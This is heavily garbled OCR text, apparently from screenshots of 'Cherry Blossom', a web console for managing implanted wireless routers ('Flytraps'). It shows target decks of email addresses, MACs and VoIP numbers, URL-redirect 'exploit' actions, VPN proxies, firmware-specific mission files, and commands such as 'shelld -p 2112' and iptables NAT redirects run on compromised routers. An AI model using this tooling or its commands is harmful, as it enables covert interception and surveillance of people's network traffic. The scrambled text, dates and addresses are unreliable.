Port = Scan AB Ports 
Status Information 
ss Qurrent Status Date = Next Mission © 5 test wonlink global 


WAN MAC = 68:7F: 74:29:4B:A9 
192.168.1200 Neat Mission Start (est. range) = 2010-12-33 17:43:55.0 


«* 2010-12-13 27:44:05.0 


Security Information 


aun Date « 2010-12-13 17:42:55.0 
ag 


admin -24,376.227.182 ° 
nn admin 0 = faut passive location — 
3733 = 24.176.227.182 ° ° 
5 + admin — 


0.0.0.0 TIP 


7223 


7224 


La st Alert: 2012-04-19 08:14:42.0 Target: you@suck.eggs 


Deployed Flytraps A 
<<<15>> 


Name a Wireless LAN MAC int, Beacon Received Init, Beacon Date Las! Beacon Dale Catapult Notified | ocation 


rome! 00:13:10:44:98:B3 Yes 26 Jan 2012 01 Feb 2012 N/A 
Dorwms) LAN=00:25:9C:41:54:2C Yes 01 Feb 2012 24 Apr 2012 N/A 
NoBoaconFlyTrap LAN#00:25;9C 00:00:00 No 14 Fab 2012 (ost.) N/A 


ke 
». > i 
Current Time: 2012-04-24 14:55:22.788 


Gitne avaccen Plan Flytraps Al 


Options: 
¢ Create a Flytrap 


Name 
Starter Flytrap Belkin Serial 00;17;:3F:40;:98:86 Belkin/F508231-4/v4/4_00_16 v 
Create 


« Edit Flytrap 
Belkin Serial 00:17:3F:40:98;86 ¥ 
Select 

« Delete Flytrap 


CPE0450 - 9E:09 00:21:80:F0:9E:09 ¥ 
Delete 


Last Alert: 2010-11-30 18:32:20.0 Target: heliotropel11 Current Time: 2010-12-17 18:21;13.241 


7225 


\ hem & Ble ssom Edit Flytrap 


e@ Belkin Serial 


Name Location Group Child Group 
Belkin Serial SLO 


WLAN MAC =00:17:3F:40:98:86 
LAN MAC =00:17:3F:40:98:86 


Make/Model/HWEW =Belkin/F5D8231-4/v4/4_00_16 


Next Mission = M Test 1 (Active) 


M Test 1 (Active) a 


Update 
Back to Plan Flyiraps 


Administer 


yahoo 

Perris st ] 

7 | 

KR 

tn pat v 
)> 


Last Alert: 2010-11-30 18:32:20.0 Target: heliotrope111 Current Time: 2010-12-17 18:22:33.091 


7226 


CherryWeb - Mozilla Firefox 


file Edit Yiew History Bookmarks Jools Help 
Gtne avec Plan Missions Al 


Options: 
« Create a Mission 


Name || 
Starter Mission ABC (Active) v 
Inftial Customer (grants write acess) All ~ Create 


« Edita Mission 
aft-5.10 (Planning) bd 
Select 
e Archive a Mission 
ABC (Active) ¥ 


Archive 


« Choose a Default Mission 
Current Default Mission = default passive location 


default passive location (Active) [DEFAULT] v 
Set as Default Mission 


vi 


Last Alert: 2010-11-30 18:32:20.0 Target: heliotropel11 Current Time: 2010-12-17 21:14:46.632 


13) (@ jeff@cock... | (i) CheryBo... | GH FAT Test... | GH [ieff@coc... |  jeff@cock... | @ ChenyWe...) G8 [iett@coc... | Ma 
€} “rplications Places System @(9 | & @y Jeff Rininger FriDeci7, 1:15PM 


7227 


7228 


<<1 


Wertex Conmncti =e 


Note: Target names are case insensitive 


Targets 


>>> 


Name re 


00118475766037 
00:01 :02:03:04:05 
00:01 :02:03:04:06 
00:08 :97:29;87:5D 
00:0D:60:CD:7E:80 
00:0E:08:2B:41:6D 
00:11:22:33:44:55 
00:12:3F:11:22:33 
00:18:8B8:CB:83:8B 
00:18:8B:CB:B3:BC 
00:1D:7E:DC:2A:69 
00:1E:65:F2:0F:BO 
00:1E:65:F2:DB:D8 
00:21:70:88:B2:83 
00:21:86:61:4B:AA 
00:24:7E:DE:SA:BA 
0118475766037 
11:22:33:44:55:66 
12345678901 234567 
18475766037 
6517553037 
838475766037 
8475764548 


Type 
VoIP 
MAC 
MAC 
MAC 
MAC 
MAC 
MAC 
MAC 
MAC 
MAC 
MAC 
MAC 
MAC 
MAC 
MAC 
MAC 
VoIP 
MAC 
Chat 
VoIP 
VoIP 
VoIP 
VoIP 


:20.0 Target: heliotropel11 4 


Gicnw ava Create a Target 
os ees Taaget Type email v tel: Translation | None v 
ee 
Create 


Missions 


Missions 


Missions 


Current Time: 2010-12-17 18:23:51,357 


RS 
v 


DE!) 


Giune avec Plan Target Decks 


Options: 
« Create a Target Deck 


Name 

Starter Target Oeck v 

Initial Customer (grants write acess) All ad 
Create 


« Edit a Target Deck 
ABC v 
Select 


« Archive a Target Deck 


ABC v 
Archive 


Last Alert: 2010-11-30 18:32:20.0 Target: heliotropel11 Current Time: 2010-12-17 18;31:31.528 


7229 


Giune avaccen) Target Deck Workflow 


Target Deck 


NewT arjetDock 
@aicam) 
1. Customer Ownership 


2. Target Deck Upload 
3. Tamet Assignment 


>> Next >> 


Last Alert: 2010-11-30 18:32:20.0 Target: heliotropel11 Current Time: 2010-12-17 18:32:08,068 


7230 


Operation Ownership 


NewDeck1 


© MewOeck! 


Operations 


Cora® a Operation 
Available Operations 


Apply Operations 


<< Back << >> Next >> 


User coumer Logout 


Last Alert: 2012-04-19 08:14:42.0 Target: you@suckeggs 


Current Time: 2012-04-24 14:33:36.798 


7231 


Gene averse Target Deck Upload Ba 
NewTargetDeck1 

© NowTargotOeckt r 

1 Tanget(s) 

Targets 


Create a Tamet 


Upload a Target Deck 
File: Browse... 
Upload Action. Append v 

Execute 


<< Back << >> Next >> 


pplications 


erect 


“I 


Last Alert: 2010-11-30 18:32:20.0 Target: heliotropel11 Current Time: 2010-12-17 18:39:32,396 


7232 


Giane avaccen Target Assignment nt 


NewTargetDeck1 
@ NewTanetDeckt 


Targets 


Create a Tamet 
Available 


1 Target(s) 
Apply Targets 


<< Back << >> Next >> 


KA 
wv 


Last Alert: 2010-11-30 18:32:20.0 Target: heliotropel11 Current Time: 2010-12-17 18:40:26.671 


7233 


CherryWeb - Mozilla Firefox 


file £dit View History Bookmarks Jools Help 


Cheny ¥#¥ Blossom 


Exploits 


Flytrap Applications 
4 f al 


wend 


Target Exploit/Action Assignment ( newssion) n 

Target Name 4 Type Copy Action Copy Timeout Windex URL 

abc@def.com Email Disabled v|0 Days\0 Hours 0 Mins asdf website (http://www.asdf.c 
Add an URL 


@ Sec to 45 Days 12 Hours 15 Mins 
(For no timeout set Days, Hours, Mins to @) 


Total targets tor the Mission: 1 
Total unique actions for Mission: 1 


Apply Actions 


<< Back << >> Next >> 


RK 
4] 
» 


Current Time: 2010-12-17 21:19:19.539 


x 


exe ] 
Last Alert: 2010-11-30 18:32:20.0 Target: heliotrope111 
(@ Chemywe...) @ (iert@coc... FIM i 


03) @ jeff@cock... 


(i CherryBo,.. @§ FATTest... &@ [jeff@coc... | BH jeff@cock... 
© @, jeff Rininger Fideci7, 1:19PM 


F) Applications Places System @ Ss 


7234 


Gone avin Create a Windex URL A 


Windex URLs 
<<<1>>> 
ld Name a URL 
3 Random Website (exit name) http//www.camelporn.org 
4 WEW (website for wankers) (edit name) http//www.wankers..org 
5 ZZZ Website (exit name) httpd www. zipnada.org 
1 asdf website (edit name) http/www.asdf.com 
2 calpoly website (edit namo) http//www.calpoly.edu 
7 mend-to-end (edit name) http//10.1.1.77:8181 ?promo_code=1Z45RDJ 
6 yyy website (edit name) http/www. Yme.net 
<<<1>>> 
Last Alert: 2010-11-30 18:32:20.0 Target: heliotropel11 Current Time: 2010-12-17 18:41:39.89 _ 


7235 


7236 


Gitn® avaccen| Add a VPN Server for 'VPN Link’ or 'VPN Proxy All' actions 


Proxy Name: || Proxy Address Port: 80 
VPN Servers 
<<<1>>> 
ld Name a Address 
4 = Fast (edit name) 192.168.1.197 
2 slo (exit name) 192.12,16.81 
1 slods! (edi name) 70.237.151.14 
3 zakura vpn (temporary) (edit name) 24.176.227.182 
<<<1>>> 
Administer 
Last Alert: 2010-11-30 18:32:20.0 Target: heliotrope111 


Create 


Port 
80 
80 
80 
80 


Current Time; 2010-12-17 18:44:34.294 


vi) 


Giune gitccen Import Mission File By 
ot Upload a Mission File: 

File Browse... 

File Compatitilitly. Universal ¥ 


Upload Action: Retain ~ 


Import 


Available Mission File(s) 


<<<1>>> 

File Name Eile Compatibility Download Last Modified 

vpn Universal download 2010-12-02 22:40:03.0 

test.txt Universal download 2010-07-07 19:27:29.0 

max_file_size_is_1010135 Unknown/Unknown/Unknown/Unknown download 2010-07-23 18:53:09.0 

max_file_name_length_32 pass Unknown/Unknown/Unknown/Unknown download 2010-07-23 18:53:41.0 

shelid_GL Linksys/WRTS54G(L)v4(1)/4_30_11_ETSldownload 2010-09-19 20:55:03.0 

shelld_300 Linksys/WRTSOON/V2/2_00_08 download 2010-09-19 22:42:11.0 

dumbbelld_belkin Belkin/-5D8231-~4/v4/4_00_16 download 2010-11-30 01:45:53.0 

<<<1>>> 

U 

Last Alert: 2010-11-30 18:32:20.0 Target: heliotropel11 Current Time: 2010-12-17 18:53:45.834 


7237 


Giunm gvaccon| Create anew command to execute on a Flytrap A 
aieeierre Create a Execute Command ‘ 
Name: 
Execution Compatibility: | Universal ¥ 
Command: jecaped chamcten of new Ines am not supported) 
Create 
Available Mission Command(s) 
<<<1>>> 
Name Command 
Hat vpn u 23232 genREMOTEADDR genREMOTEPORT genCLIENTCSUBN 
niversal 
ABC echo “Hello World!" > /dev/null 
Universal 
shelld shelld -p 12345 
Linksys/WRT54G(L)/v4(1)/4_30_11_ETSI 
shelld_GL port 2112 shelld_GL -p 2112 
Linksys/WRT54G(L)v4(1)/4_30_11_ETSI 
echo universal echo “Fetznrausch” > Ampitmp.txt 
Universal 
killall GL shelld killall shelld_GL 
Linksys/WRT54G(L)v4(1)/4_30_11_ETSI 
shelld_300 port 2112 shelld_300 -p 2112 {| 
Linksys/WRT300N/v2/2_00_08 | 
dumbbelld_belkin port 2112 dumbbelld -p 2112 
Belkin/F5D8231-4/v4/4_00_16 
nat 80 to 8104 iptables -t nat -R PREROUTING 3 -p tcp -d 192.12.16.81 --dport 80 + DNA 
Linksys/WRT54G(L)v4(1)/4_30_11_ETSI 
nat 8080 to 8104 iptables -t nat -R PREROUTING 4 -p tep -d 192.12.16.81 --dport 8080 | DN 
i Linksys WRTS4GILWv4(1¥4 30 11 ETSI _ ne 
Last Alert: 2010-11-30 18:32:20.0 Target: heliotrope111 Current Time: 2010-12-17 18:54:25.776 


7238 


file Edit Yiew History Bookmarks Jools Help 
Giune avecen Add a PoP (Point of Presence) 


name: (——} encontrar 


PoP(s) 

<<<1>> 

ld Name ri 
1 Edit “this* (ect name) 

3 ZZWankersAway (exit name) 

2 = zakura dev (8080) (edit name) 

<<<1>>> 


Last Alert: 2010-11-30 18:32:20.0 Target: heliotropel111 


CherryWeb - Mozilla Firefox 


B 
r 
Pon: 80 Create 
Address Port 
0.0.0.0 0 
255.255.255.1 2345 
24.176.227.182 8080 


vi 


Current Time: 2010-12-17 18:59:27.853 


13) jett@cock... | [% CheryBo... | @ FAT Test... | GB [ieff@coc... | @ jeff@cock... (@ ChenyWe... | @ liet@coc... | Ml i 


iF) Applications Places System @ (3 | 


© @, Jett Ringer FriDec17,10:59AM 


7239 


CherryWeb - Mozilla Firefox 


file Edit Yiew History Bookmarks Jools Help 
G@icn® avaccen Plan Missions Al 


ervew Options: 
* Create a Mission 


Name | | 
Starter Mission ABC (Active) v 
Initial Customer (grants write acess) | All ~ Create 


« Edita Mission 
aft-5.20 (Planning) ~ 
Select 
« Archive a Mission 
ABC (Active) v 


Archive 


« Choose a Default Mission 
Current Default Mission = default passive location 


default passive location (Active) [DEFAULT] ¥ 
Set as Default Mission 


Last Alert; 2010-11-30 18:32:20.0 Target: heliotrope111 Current Time: 2010-12-17 21:14:46.632 


13) | @ jeff@cock... | (1 CheryBo... | GH FAT Test... | GH Liefi@coc... | & jeff@cock... | @ ChenyWe...) GB liert@coc... |i My 
€} “rplications Places System @ (6 S © @, eft Rininger Fieci7, 1:15PM 


7240 


file Edit View History Bookmarks Jools Help a 


Gtne aie Mission Workflow A 


Mission 


Newtission 


Customer Ownership 
Support Parameters 
Tampet Decks) 

Tanpot Expioit/Action(s) 
Mission Fite{s) 

Execute Command(s) 
Firmware Version Siringis} 
PoP(s) 


@ Sukide Properties 


ONAN ON = 


© Asskin Mission to Fiytraj 


>> Next >> 


Last Alert: 2010-11-30 18:32:20.0 Target: heliotrope111 Current Time: 2010-12-17 21:16:04.952 


13) (@ jeff@cock... | (i) CheryBo... | @ FAT Test... | GW [ieff@coc... |  jeff@cock... |/@ ChenyWe...) G8 [iett@coc... | Ma i 
€} “rplications Places System @ (9 S & ®, Jeff Rininger FriDeci7, 1:16PM 


7241 


Operation Ownership (rower scion res a) 


Operations 


Create o Ope mtion 
Available Operations 


Apply Operations 


<< Back << >> Next >> 


User couser Logout 


k 
Last Alert: 2012-04-19 08:14:42.0 Target: you@suck.eggs Current Time: 2012-04-24 14:42:21,123 


7242 


CherryWeb - Mozilla Firefox 


file Edit Yiew History Bookmarks Jools Help 


Glow avaccon! Edit Mission Support Parameters (nemsssio0) A 
Mission Name |New Mission 
Periodic Beacon Parameters 
Interval Traffic Requirement Traffic Requirement Timeout Power Cycle Wait 
0 Days None »v 0 Days (0 | 
0 Hours 0 Hours o 
1 Mins 0 )6=—s Mins 0 
0 Secs N/A 10 ©6Secs 1 
Select a Traffic Requirement 
1 Min to 91 Days @ Sec to 91 Days 8 
Target Monitoring Parameters 
Session Timeout Target Monitoring 
0 ~—_ (Days No v | 
5 Mins Select Target Mon 
0 Secs 
30 Secs to 1 Day 
| 
Filter Parameters 
Port Scanning Protocol Scanning Remove AcceptEncoc 


Scan All Ports ¥ 


Binesn mt © Miankal Aantinna 


ere 
Last Alert: 2010-11-30 18:32:20.0 Target: heliotropel11 


13 GD jeff@cock... | CherryBo... @ FAT Test... 


Scan All Protocols ~ Yes v | 


KI 
v 
>> 


Current Time: 2010-12-17 21:18:00.239 


lieff@coc... | BH jeff@cock... |(@ ChemyWe... GF (iert@coc... FIT IM i 


3 Ppiications Places system @G 


© @, Jett Ringer FriDeci7, 1:18PM 


7243 


CherryWeb - Mozilla Firefox 
file Edit Yiew History Bookmarks Jools Help 
Gicne aveccen Target Deck Assignment (newsion) A 


Target Decks 


Create a Tamet Deck 
Available 


1 Target(s) included from selected decks. 
Apply Target Decks 


<< Back << >> Next >> 


Last Alert; 2010-11-30 18:32:20.0 Target: heliotropel11 Current Time: 2010-12-17 21:18:33.584 


13) | @ jeff@cock... | (i) CheryBo... | GH FAT Test... | GH Liefi@coc... | @ jeff@cock... | @ ChenyWe...) G8 liert@coc... |i Ma 
3 “eplications Places System @/5 S © @, eft Ringer Fieci7, 1:18PM = 


7244 


file Edit Yiew History Bookmarks Jpols Help 
Gione avaccon! Target Exploit/Action Assignment (newsssion) 


Target Name 4 Type Copy Action Copy Timeout 
@ Sec to 45 Days 12 Hour 
(For no timeout set Days 


Total targets tor the Mission: 1 
Total unique actions for Mission: 1 


Apply Actions 


<< Back << >> Next >> 


Last Alert: 2010-11-30 18:32:20.0 Target: heliotrope111 


[2 «GH jeff@cock...  [@ CheryBo... GH FATTest... & [jeff@coc... | BH jeff@cock 


[ 


abc@def.com Email pisabled ~|/0 Days\0 Hours 0 


CherryWeb - Mozilla Firefox 


h 
Windex URL 
Mins asdf website (http:/www.asdf.c 
$s 15 Mins Add an URL 
, Hours, Mins to @) 
5 5 M4 


Current Time: 2010-12-17 21:19:19,539 


- | @ Chemywe...) 8 Uerecoc... |Fi a m 


F) Applications Places System @( S 


© @, Jett Ringer FiDeci7, 1:19PM 


7245 


file f£dit Yiew History Bookmarks Jools Help 


Execute Command Assignment (new#ssion) 4 


+ 


Execute Commands 


Add a Execute Command 


Available 


Apply Execute Commands 


<< Back << >> Next >> 


| 
v 


rq .¢ 


55 


Last Alert: 2010-11-30 18:32:20.0 Target: heliotrope111 Current Time: 2010-12-17 21:22:55.116 


13) G jeff@cock... | (2 CheryBo... | @H FAT Test... |G lieff@coc... | BH jeff@cock... (@ ChenywWe... | @ liet@coc... |i i & 
3 “eplications Places System @/ =] © @, eft Ringer FiDec17, 1:23PM = 


7246 


CherryWeb - Mozilla Firefox 


file Edit Yiew History Bookmarks Jools Help 


Gionwe avaccon! Firmware Version String Replacement (rcwssice) aA 
i Device MMV Manufacturer's Original FW Version String Desired FW Version String 
Linksys/WRT54G(L)v4(1) v4.30.11 ) 
4_30_11_ETSI 
Linksys/)WRTSOON/v2/2_00_08 2.00.08 
Belkin/F5D8231 -4/v4/4_00_16 F508231-4_WW_4.00.16 


Update 


<< Back << >> Next >> 


vi 


Last Alert; 2010-11-30 18:32:20.0 Target: heliotropel11 Current Time: 2010-12-17 21:23:42.362 
13) (@ jeff@cock... | (i) CheryBo... | GH FAT Test... | [ieff@coc... |  jeff@cock... | @ ChenyWe...) G8 [iett@coc... | My 
€} “Pplications Places System @( =] 4 @ Jeff Rininger FriDec17, 1:23PM 


7247 


Ble Edit View History Bookmarks Tools Help 


a ~ © @& UL) ottps:sn0.1.2.27:8443/cherrywebsapp v | iGly hysqld_safe "exit 127°, 
Mp Most Visited~ 6)Release Notes (jFedora Projecty fgjRedHat~ G@yfree Contentv 
10) He:iMome/...erryweontnes | siifhome/)...erytee.html os | Page Load Error x. CherryWeb xiv 
Chen Wissen POP Assignment ( crmissiontest tenn) Al 
PoP(s) 
Ad¢ a PoP 


Use Firmware Default PoP(s) in Mission: yo v | | 
Apply PoP(s) 


<< Back << >> Next >> 


|] 
vi 


Last Alert: 2012-07-10 22:58:54.0 Target: snakes@scary.gov Current Time: 2012-07-17 22:04:21.817 
Done 10.1.1.27:8443 §& 


7248 


file Edit View History Bookmarks Jools Help = 


Glow avaccon| Suicide Mission Properties (nesmssion) 4 
Version 4 vn 827 h 
Suicide Enabled Suicide Time 
No v 
Update 
<< Back << >> Next >> 
Last Alert: 2010-11-30 18:32:20.0 Target: heliotrope111 Current Time: 2010-12-17 21:25:41.928 
13) (@ jeff@cock... | (i) CheryBo... | @H FAT Test... | [ieff@coc... |  jeff@cock... | @ ChenyWe...) G8 [iett@coc... | Ma 
F) Applications Places System @( S & ®, Jeff Rininger FriDeci7, 1:25PM 
Mission Assignment 
Seu Sele Hares boquent been tewwe) TEI MAT) 8 
<<<32)55222 
Seles Sine a Lesatien Current Mission Assigned Mission 
. Albert-10: 67:74 00:36:46:10:67:74 Albert T2 Forever 
CB margarita aw LAN@ OO: 10: FO;CS:1F: 6S greenhouse Ki8 CB margarita aw LAN «00:10 :FO-CS:1F:65 rn - f 
« DIB test LAN 6 O0:24:01:42:59:1F Getmuit Harvest frequert beacon defauh Harvest frequent beacon 
=2F:74:29-408 lb H Test 4 Rev. 2 M Test 4 Rev, 2 
K Moto 00:0C:10-21:32:01 detmutt detaur 
o MXIT Beikin F508231-4 y-S 00:17: 3F-40:01:7C SLO S.test 7910 we detect copy crash debe 4 M Test 3 Rey, 2 
"i MKIT Linksys WRTS00N v2 00:18:39:90-18:C4 SLO Mies 4 Bev 2 Meet 3 ev, 2 
<<<12345> >> 
Select All 


7249 


CherryWeb - Mozilla Firefox 


file Edit Yiew History Bookmarks Jools Help : 
@tne avec Plan Missions Ba 


Options: 
« Create a Mission 


Namef 


Starter Mission ABC (Active) ¥ 
Initia Customer (grants write acess) | All ~ | Create 


« Edita Mission 
aft-5.10 (Planning) ™. 
Select 
« Archive a Mission 
ABC (Active) v 


Archive 


« Choose a Default Mission 
Current Default Mission = default passive location 


default passive location (Active) [DEFAULT] v 
Set as Default Mission 


KR 
v 


Last Alert; 2010-11-30 18:32:20.0 Target: heliotrope111 Current Time: 2010-12-17 21:14:46.632 


£3) | @ jeff@cock... | (1) CheryBo... | GH FAT Test... | GW Lieff@coc... | @ jeff@cock... |/@ ChenyWe...) G8 liert@coc... | Ma 
€} “pplications Places System @ (9G 3 ©& @, left Rininger FiDeci7, 1:15PM 


7250 


CherryWeb - Mozilla Firefox 


file Edit Yiew History Bookmarks Jools Help 
Gtne avec Plan Missions Al 


Options: 
« Create a Mission 


Name || 
Starter Mission ABC (Active) v 
Inftial Customer (grants write acess) All ~ Create 


« Edita Mission 
aft-5.10 (Planning) bd 
Select 
e Archive a Mission 
ABC (Active) ¥ 


Archive 


« Choose a Default Mission 
Current Default Mission = default passive location 


default passive location (Active) [DEFAULT] v 
Set as Default Mission 


vi 


Last Alert: 2010-11-30 18:32:20.0 Target: heliotropel11 Current Time: 2010-12-17 21:14:46.632 


13) (@ jeff@cock... | (i) CheryBo... | GH FAT Test... | GH [ieff@coc... |  jeff@cock... | @ ChenyWe...) G8 [iett@coc... | Ma 
€} “rplications Places System @(9 | & @y Jeff Rininger FriDeci7, 1:15PM 


7251 


CherryWeb - Mozilla Firefox 


file Edit Yiew History Bookmarks Jools Help 
G@icn® avaccen Plan Missions Al 


ervew Options: 
* Create a Mission 


Name | | 
Starter Mission ABC (Active) v 
Initial Customer (grants write acess) | All ~ Create 


« Edita Mission 
aft-5.20 (Planning) ~ 
Select 
« Archive a Mission 
ABC (Active) v 


Archive 


« Choose a Default Mission 
Current Default Mission = default passive location 


default passive location (Active) [DEFAULT] ¥ 
Set as Default Mission 


Last Alert; 2010-11-30 18:32:20.0 Target: heliotrope111 Current Time: 2010-12-17 21:14:46.632 


13) | @ jeff@cock... | (1 CheryBo... | GH FAT Test... | GH Liefi@coc... | & jeff@cock... | @ ChenyWe...) GB liert@coc... |i My 
€} “rplications Places System @ (6 S © @, eft Rininger Fieci7, 1:15PM 


7252 


DE!) 


Giune avec Plan Target Decks 


Options: 
« Create a Target Deck 


Name 

Starter Target Oeck v 

Initial Customer (grants write acess) All ad 
Create 


« Edit a Target Deck 
ABC v 
Select 


« Archive a Target Deck 


ABC v 
Archive 


Last Alert: 2010-11-30 18:32:20.0 Target: heliotropel11 Current Time: 2010-12-17 18;31:31.528 


7253 


CherryWeb - Mozilla Firefox 


file Edit Yiew History Bookmarks Jools Help 


Cheny # Blossom Mi GET aT Al 
version 40 (evnt276) RTE x 
Belkin Serial 00:17:3F:40:98:86 v 
Kill Selected Flytrap 
Last Alert: 2010-11-30 18:32:20.0 Target: heliotropel11 Current Time: 2010-12-17 21:36:21.049 
13) | @ jeff@cock... | (i CheryBo... | GH FAT Test... | GH Liefi@coc... | & jeff@cock... | @ ChenyWe...) G8 liert@coc... |i a 
€} “rplications Places System @(G S ©& @, eft Rininger FriDec 17, 1:36PM = 


7254 


Alerts 


Cheny #¥ Blossom 


<<<1234567>>> 


w Show Alerts for Derived Targets 


Session Active Last Activity 


smith test2@hotmail.com No 2010-09-30 18:47:28.0 
in N/A 2010-09-28 18:54:36.0 
smith test2@hotmail.com No 2010-09-28 17:51:52.0 
smith testi@yahoo.com No 2010-09-28 17:15:13.0 
smith test2@hotmail.com No 2010-09-28 17:15:13.0 
F No 2010-09-28 16:29:34.0 
smith test2@hotmail.com No 2010-09-28 16:29:34.0 
i .comNo 2010-09-28 16:29:34.0 
00:21:70:88:-82:83 No 2010-09-28 16:29:34.0 
i i No 2010-09-28 16:29:34.0 
<<<1234567>>> 
fe ». 
Last Alert: 2010-06-17 23:26:20.0 Target: space@test.com 


Windex Alert Copy Data Client MAC 


No Data 
No Data 
No Data 
No Data 
No Data 
No Data 
No Data 
No Data 
No Data 
No Data 


00:0D:60:CD:7E:B0 192. 
00:21:70:88:B2:83 192. 
00:21:70:88:B283 192. 
00:21:70:88:B283 192. 
00:21:7088:B283 192. 
00:21:70:88:B283 192. 
00:21:70:88:82:83 192. 
00:21:7088:B283 192. 


Clie, 


00:21:70:88:82:83 192.) 


00:21:70:88:82:83 192. 


»> 


Current Time: 2011-01-03 17:24:51,987 


— 
v 


7255 


7256 


Target Activity Overview 


<<<1o>> 


Target v 
zakura.test@gmail.com N/A 
zakura.test@qmailcom N/A 
zakura.test@gmail.com N/A 
test@testing.com N/A 
test@testing com NIA 
test002@testing.com N/A 
test001 @testing. com N/A 


test001 @testing. com 

smith test4@gawab.com N/A 
smith test4@gawab.com N/A 
smith test4@qawab.com N/A 
smith _test3@maktoob.comN/A 
smith test2@hotmail.com N/A 
smith _test2@hotmail.com N/A 
smith test2@hotmail.com N/A 
smith test2@hotmail.com N/A 
smith test2@hotmail.com N/A 
smith testi@yahoo.com N/A 


mith testt com N/A 
smith testi@yahoo.com N/A 
smith testi@yahoo.com No 
smith testi@yahoo.com N/A 
smith testi@yahoo.com N/A 
heliotropeaim N/A 
heliotropeaim NIA 
heliotropeaim N/A 
heliotropeaim N/A 
heliotrope111 No 
heliotrope111 N/A 
heliotrope111 N/A 
bethenaaim N/A 


Last Alert: 2010-11-30 18:32:20.0 Target: heliotrope111 


Session Active Name 


A 
hr 
Flytrap | 
Location Client MAC Alert Actual Dé 
CW 2 08:D3:85:99:1B:C5 2010-10-13 19 
MKIT Belkin SLO = OONE:65:F2:0F BO 2010-11-29 22 
MKIT Linksys WRT300N v2SLO 00: 16: ‘65:F2:0F BO 2010-11-2501 
Belkin Serial SLO 2010-07-26 16 
MKIT WRTS4GL SLO 00:1E:65:F2:0F:-BO 2010-11-03 21 
MKIT Linksys WRT3OON v2SLO = O0:1E:65:F2:0F BO 2010-11-29 17 
KIT Belkin SLO 00; 1E 65: Fe: OF BO 0 2010-11-3002 
MKIT WATS4GL SLO 2010-11-08 21 
MKIT Belkin SLO 00:1E:65:F2:0F-BO 2010-11-29 22 
SLO 2010-11-25 01 
MKIT WRTS4GL SLO OO:1E:65:F2:0F BO 2010-11-03 19 
MKIT WATS4GL SLO = 00:24 :7E:DE:9A:BA 2010-07-23 21 
cw 2 08:D3:85:99:1B:C5 2010-10-13 19 
MKIT Belkin SLO = OO1E:65:F2:0F BO 2010-11-300 
MKIT Linksys WRT3OON v2SLO OOJE65:F20F BO 2010-11-29 18 
MKIT WRTS4GL SLO 2010-11-18 21 
MKIT WRTS4GL SLO 00:24:7E:DE-SA:BA 2010-07-23 21 
cWwi4 08:03:85:99:18:D3 2010-10-06 1 
CW 2 D8:03:85:99:1B:C5 2010-10-13 1 
MKIT Belkin SLO 2010-11-29 22 
MKIT Linksys WRT300N v2SLO 00:1E:65:F2:0F-BO 2010-11-291 
MKIT WRTS4GL SLO 2010-11-19 1 
MKIT WRTS4GL SLO 00:24:7E :DE:9A:BA 2010-07-23 21 
MKIT Belkin SLO = OONE65:F2:0F BO 2010-11-29 2 
MKIT Linksys WRT3OON v2SLO 00:1E:65:F2:0F BO 2010-11-25 01 
IT SLO 00:1E:65:F2:0F-BO 2010-11-03 18 
MKIT WRT54GL SLO 00:24:7E ‘DE 9A BA 2010-07-23 21 
MKIT Belkin | SLO | 2010-11-301 
MKIT Linksys WRT300N v2SLO 00:1E:65:F2:0F-BO 2010-11-29 18 
MKIT WRTS4GL SLO OONE:65:F2:0F:BO 2010-11-03 1 
cw 1 D8:03:85:99:1B:D3 2010-10-05 19 
p.___}} 


Current Time: 2010-12-17 17:46;03.379 


ene advise Target Details 


Target: smith_test2@hotmail.com 


= 
v 


Flytrap Most Recent Session 

Session Active Name Location Client MAC Start Time End Time 
No 00:18:F8:B7:B7:A5 00:15:58:84:08F4 2010-01-21 01:19:49.02010-01-21) 
No J WRT320N Serial Lab 00:0D:60:CD:7E-B0 2010-09-30 18:28:25.0 2010-09-30 
No J WRT320N Serial Lab 00:21:70:88:B2:83 2010-09-28 17:51:52.02010-09-28 
N/A M DLink DIR-330 SLO 4 2009-02-26 22:28:35.0 2009-02-26 
N/A M DLink DIR-330 SLO 08:00:46:C3:02:87 2009-02-26 00:45:30.0 2009-02-26 
N/A MKIT Belkin F5D8231-4 v4 SLO OO12:3F:11:22:33 2009-10-23 17:42:14.0 2009-10-24 
No MKIT Belkin F5D8231~4 v4 SLO 00:15:58:84:08F4 2010-01-15 01:17:13.02010-01-15 
N/A MKIT Belkin F5D8231-4 v4 SLO 00:1E:65:F2:0F:BO 2010-01-21 02:02:25.0 2010-01-21 
N/A MKIT Belkin F5D8231-4 v4 SLO 08:00:46:C3:02:B7 2009-10-26 19:47:08.0 2009-10-26 
N/A MKIT Li R SLO 00:0B:97:96:FC:69 2010-01-19 21:13:23.02010-01-19 
N/A MKIT Linksys WRT300N v2 SLO 00:1E BSF20F BO 2010-01-19 21:01:42.02010-01-19 
N/A MKIT WRTS4G v5 SLO 2010-01-21 23:22:34.02010-01-21 
N/A MKIT WATS4G v5 SLO 00: 16.65. F2:0F:BO 2010-01-21 22:20:14.02010-01-21) 
N/A — 2010-01-22 18:58:59.0 2010-01-22 
N/A Sunflower seed 00:02: aF 00:02:3F:94:08:6C 2009-01-15 22:18:13.02009-01-15 
N/A eunflouer need 00:1:00:76:A8:40 remote 00:22:5F :35:DF:CE 2009-07-23 19:40:55.02009-07-23 
N/A $ FT3 slo 00:11:43:A8:8A:67 2009-09-22 17:43:37.0 2009-09-22 
N/A WRTSOON v2 Bad Power SLO 00:0B:97:96:FC:69 2009-10-21 21:05:20.0 2009-10-21 
exe ». » 

Last Alert: 2010-06-17 23:26:20.0 Target: space@test.com Current Time: 2011-01-03 17:23:55,149 


7257 


rr 


henry We Bl 


ssom 


Copy Data 


<<<1>>> 


File File Size FlyTrap 


download 0.2 MB 


download0.2MB — 


download 24.8 MB 


download 1.0MB — 


download0.1 MB 


download 7,0 MB 
download 1.0 MB 


download4.9MB NM 


download 12.2 MB 


download 0,3 MB 


download 0.7 MB 
download 0.3 MB 


download0,1MB 


download 0.2 MB 


download 0.9 MB 
download 0.9 MB 


SlimBoyFlyTrap 00:25:9C :38 :D3-58 
MKIT Belkin 00:17:3F:40:01:7C 


MKIT Belkin 00:17:3F:40:01:7C 
MKIT Belkin 00:17:3F:40:01:7C 


Last Modified Start Time vw 
2010-11-30 23:52:46.0 2010-11-30 23:26:52.000 
2010-11-30 23:26:49.0 2010-11-30 23:08:40,000 
2010-11-30 21:08:57.0 2010-1 1-30 20:44:48,000 
2010-11-30 02:11:25.0 2010-11-30 02:03:05.000 
2010-11-30 02:02:52.0 2010-11-30 02:00:28,000 
